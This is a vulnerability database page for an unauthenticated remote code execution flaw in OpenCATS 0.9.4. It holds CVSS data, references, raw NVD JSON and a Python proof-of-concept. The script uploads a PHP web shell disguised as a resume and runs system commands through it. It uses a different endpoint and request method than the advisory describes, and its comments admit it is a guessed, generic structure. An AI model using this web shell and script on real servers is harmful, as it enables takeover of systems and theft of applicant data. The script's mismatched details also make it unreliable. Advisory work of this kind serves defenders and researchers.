CVE-2021-47936

Description

OpenCATS 0.9.4 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by uploading malicious PHP files disguised as resume attachments. Attackers can upload PHP payloads through the careers job application endpoint and execute system commands via POST requests to the uploaded file in the upload directory.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

OpenCATS 0.9.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# Proof of Concept for CVE-2021-47936
import requests

def exploit(target_url):
    # 1. Upload malicious PHP file as resume
    upload_endpoint = f"{target_url}/index.php?m=candidates&a=add"
    
    # PHP payload to execute system commands
    php_payload = "<?php system($_GET['cmd']); ?>"
    
    files = {
        'file': ('evil_resume.php', php_payload, 'application/octet-stream')
    }
    # Sample data required by the form (may need adjustment based on version)
    data = {
        'isAjax': '1',
        'candidateID': '0'
    }

    print("[*] Attempting to upload malicious resume...")
    try:
        # Note: Actual endpoint parameters might vary, this is a generic PoC structure
        response = requests.post(upload_endpoint, files=files, data=data)
        if response.status_code == 200:
            print("[+] Upload request sent successfully.")
            # 2. Execute the uploaded file
            # Assuming the file is saved in the upload directory with the original name
            exec_url = f"{target_url}/upload/evil_resume.php?cmd=whoami"
            print(f"[*] Triggering payload at: {exec_url}")
            exec_response = requests.get(exec_url)
            if exec_response.status_code == 200:
                print("[+] Command execution output:")
                print(exec_response.text)
            else:
                print("[-] Failed to execute payload.")
        else:
            print(f"[-] Upload failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = "http://example.com/opencats" # Replace with actual target
    exploit(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47936
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47936
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47936/
[4] VulDB https://vuldb.com/cve/CVE-2021-47936
[5] https://github.com/opencats/OpenCATS
[6] https://www.exploit-db.com/exploits/50585
[7] https://www.opencats.org/
[8] https://www.vulncheck.com/advisories/opencats-remote-code-execution-via-resume-upload

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47936", "sourceIdentifier": "[email protected]", "published": "2026-05-10T13:16:29.830", "lastModified": "2026-05-12T14:24:15.210", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenCATS 0.9.4 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by uploading malicious PHP files disguised as resume attachments. Attackers can upload PHP payloads through the careers job application endpoint and execute system commands via POST requests to the uploaded file in the upload directory."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/opencats/OpenCATS", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50585", "source": "[email protected]"}, {"url": "https://www.opencats.org/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/opencats-remote-code-execution-via-resume-upload", "source": "[email protected]"}]}}